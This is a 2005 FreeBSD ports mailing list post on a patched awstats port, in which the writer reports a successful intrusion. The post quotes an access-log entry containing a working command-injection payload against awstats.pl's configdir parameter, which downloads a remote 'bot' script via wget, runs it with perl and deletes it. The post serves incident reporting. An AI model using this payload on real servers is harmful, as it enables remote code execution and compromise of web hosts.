FreeBSD Port: awstats-6.2
Charlie Schluting
charlie at schluting.com
Wed Jan 26 19:53:30 PST 2005
On 1/26/2005 5:20 PM, Andrew J Caines wrote:
> FWIW, I think the original patch posted was lacking some changes in the
> pkg-plist which may or may not have been in the 6.2 update, when various
> bit moved around and the installed files changed.
>
> I've made another[1] for the 6.3 port[2]. This 6.3 port builds, installs,
> runs[3] and deinstalls cleanly. It doesn't specifically address any .jar
> install or other issues.
Indeed, the patch works (had to manually grab the tarball).
FWIW, yes, exploits are definitely in the wild. I grepped my logs for "wget"
and saw one (successful) attempt:
/var/log/httpd-access.log:66.235.209.85 - - [26/Jan/2005:17:43:22 -0800] "GET
/awstats/awstats.pl?configdir=%20%7Cecho%20;echo%20;cd%20/var/tmp;wget%20www.theplaza.co.uk/media/bot%20-O%20bot22;perl%20bot22;rm%20-f%20bot*;echo%20;echo%20%7C%20
HTTP/1.1" 200 588 "-" "LWP::Simple/5.65"
If you look at the code on: http://www.theplaza.co.uk/media/bot you'll see
that it tries to start:
www 29943 101.6 0.5 4236 3504 ?? R 5:38PM 113:06.70
/usr/local/apache/bin/httpd -DSS1 (perl)
Fuckers :(
Thanks for the patch!
-Charlie
More information about the freebsd-ports
mailing list